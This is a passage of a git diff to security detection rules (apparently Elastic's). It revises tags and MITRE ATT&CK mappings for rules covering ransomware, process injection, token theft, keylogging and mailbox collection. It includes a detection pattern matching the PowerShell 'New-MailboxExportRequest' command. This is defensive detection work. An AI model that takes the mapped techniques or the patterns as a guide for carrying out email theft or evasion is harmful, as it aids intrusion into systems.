[guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "critical" -tags = ["Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,15 +67,3 @@ Elastic Endgame is a security solution designed to detect and respond to threats - Enhance monitoring and detection capabilities by configuring alerts for similar event patterns and behaviors identified in the query fields. - Report the incident to relevant authorities and stakeholders as per organizational policy and legal requirements, ensuring compliance with any regulatory obligations.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/promotions/endgame_ransomware_prevented.toml b/rules/promotions/endgame_ransomware_prevented.toml index 4e91b760d30..28f96352a27 100644 --- a/rules/promotions/endgame_ransomware_prevented.toml +++ b/rules/promotions/endgame_ransomware_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -69,15 +69,3 @@ Elastic Endgame is a security solution designed to prevent ransomware by monitor - Notify the IT security team and relevant stakeholders about the incident for awareness and further investigation into potential vulnerabilities exploited. - Document the incident details, including the response actions taken, to improve future incident response strategies and facilitate any necessary reporting or compliance requirements.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/promotions/execution_endgame_exploit_detected.toml b/rules/promotions/execution_endgame_exploit_detected.toml index 377f3d62796..c74ed775d20 100644 --- a/rules/promotions/execution_endgame_exploit_detected.toml +++ b/rules/promotions/execution_endgame_exploit_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,13 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Execution", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Endgame", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -72,12 +78,20 @@ Elastic Endgame is a security solution that monitors and detects exploit attempt [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/execution_endgame_exploit_prevented.toml b/rules/promotions/execution_endgame_exploit_prevented.toml index 6e9ceb442ad..9882090ac4d 100644 --- a/rules/promotions/execution_endgame_exploit_prevented.toml +++ b/rules/promotions/execution_endgame_exploit_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -80,25 +80,20 @@ Elastic Endgame is a security solution designed to prevent exploits by monitorin [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml index d25aef0cd49..c828eafd159 100644 --- a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,26 +72,14 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml index ee8309c7d75..654389a20dd 100644 --- a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,26 +72,14 @@ Elastic Endgame is a security solution that prevents unauthorized credential man [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml index cd8997f1f08..da56645fb6b 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,36 +72,14 @@ Elastic Endgame is a security solution that monitors and detects unauthorized ac [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml index 70363bba749..9b43b081eca 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,36 +72,14 @@ Elastic Endgame is a security solution that prevents unauthorized access by moni [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml index 7de13ee97f7..38a36feec06 100644 --- a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -73,26 +73,14 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml index 9c49b986608..5a5e8b7765d 100644 --- a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,26 +72,14 @@ Elastic Endgame is a security solution that prevents malicious activities like p [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/threat_intel/threat_intel_indicator_match_email.toml b/rules/threat_intel/threat_intel_indicator_match_email.toml index f17ba379307..e4fa4bfc04d 100644 --- a/rules/threat_intel/threat_intel_indicator_match_email.toml +++ b/rules/threat_intel/threat_intel_indicator_match_email.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2025/04/11" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/22" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ or a [custom integration](https://www.elastic.co/guide/en/security/current/es-th More information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html). """ severity = "high" -tags = ["Rule Type: Threat Match", "Tactic: Initial Access", "Resources: Investigation Guide"] +tags = ["Rule Type: Threat Match", "Resources: Investigation Guide"] threat_index = ["filebeat-*", "logs-ti_*"] threat_indicator_path = "threat.indicator" threat_language = "kuery" @@ -165,16 +165,3 @@ value = "threat.indicator.email.address" type = "mapping" field = "email.reply_to.address" value = "threat.indicator.email.address" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/collection_email_outlook_mailbox_via_com.toml b/rules/windows/collection_email_outlook_mailbox_via_com.toml index 7f7f82b9bac..bdff598faa5 100644 --- a/rules/windows/collection_email_outlook_mailbox_via_com.toml +++ b/rules/windows/collection_email_outlook_mailbox_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/14" [rule] author = ["Elastic"] @@ -21,7 +21,14 @@ references = [ risk_score = 47 rule_id = "1dee0500-4aeb-44ca-b24b-4a285d7b6ba1" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -80,36 +87,36 @@ Outlook's integration with the Component Object Model (COM) allows processes to [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" - [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" reference = "https://attack.mitre.org/techniques/T1114/001/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/collection_email_powershell_exchange_mailbox.toml b/rules/windows/collection_email_powershell_exchange_mailbox.toml index fee81690d6d..97ba3fb44a3 100644 --- a/rules/windows/collection_email_powershell_exchange_mailbox.toml +++ b/rules/windows/collection_email_powershell_exchange_mailbox.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -75,7 +75,21 @@ references = [ risk_score = 47 rule_id = "6aace640-e631-4870-ba8e-5fdda09325db" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -88,18 +102,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" - [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/collection_mailbox_export_winlog.toml b/rules/windows/collection_mailbox_export_winlog.toml index 693f71e02fc..90ae0bf3cf8 100644 --- a/rules/windows/collection_mailbox_export_winlog.toml +++ b/rules/windows/collection_mailbox_export_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -120,21 +120,32 @@ powershell.file.script_block_text : "New-MailboxExportRequest" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" +[[rule.threat.technique.subtechnique]] +id = "T1114.001" +name = "Local Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/001/" [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_audio_capture.toml b/rules/windows/collection_posh_audio_capture.toml index e40e8488f51..3f922888c59 100644 --- a/rules/windows/collection_posh_audio_capture.toml +++ b/rules/windows/collection_posh_audio_capture.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -96,7 +96,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -122,34 +129,39 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1123" name = "Audio Capture" reference = "https://attack.mitre.org/techniques/T1123/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_clipboard_capture.toml b/rules/windows/collection_posh_clipboard_capture.toml index f84dfe236b9..149d213dfb5 100644 --- a/rules/windows/collection_posh_clipboard_capture.toml +++ b/rules/windows/collection_posh_clipboard_capture.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -153,16 +153,34 @@ case_insensitive = true value = "?:\\\\Program?Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1115" name = "Clipboard Data" reference = "https://attack.mitre.org/techniques/T1115/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_keylogger.toml b/rules/windows/collection_posh_keylogger.toml index 58297f5baa7..d99809a9e75 100644 --- a/rules/windows/collection_posh_keylogger.toml +++ b/rules/windows/collection_posh_keylogger.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -104,7 +104,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -128,57 +135,44 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" - [[rule.threat.technique.subtechnique]] id = "T1056.001" name = "Keylogging" reference = "https://attack.mitre.org/techniques/T1056/001/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1056" -name = "Input Capture" -reference = "https://attack.mitre.org/techniques/T1056/" - -[[rule.threat.technique.subtechnique]] -id = "T1056.001" -name = "Keylogging" -reference = "https://attack.mitre.org/techniques/T1056/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_mailbox.toml b/rules/windows/collection_posh_mailbox.toml index 936b683766c..a13e4dc57b8 100644 --- a/rules/windows/collection_posh_mailbox.toml +++ b/rules/windows/collection_posh_mailbox.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -135,12 +135,10 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" - [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" @@ -151,10 +149,30 @@ id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_screen_grabber.toml b/rules/windows/collection_posh_screen_grabber.toml index 8c0cdb1752a..f97f5db210d 100644 --- a/rules/windows/collection_posh_screen_grabber.toml +++ b/rules/windows/collection_posh_screen_grabber.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -136,16 +136,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1113" name = "Screen Capture" reference = "https://attack.mitre.org/techniques/T1113/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = 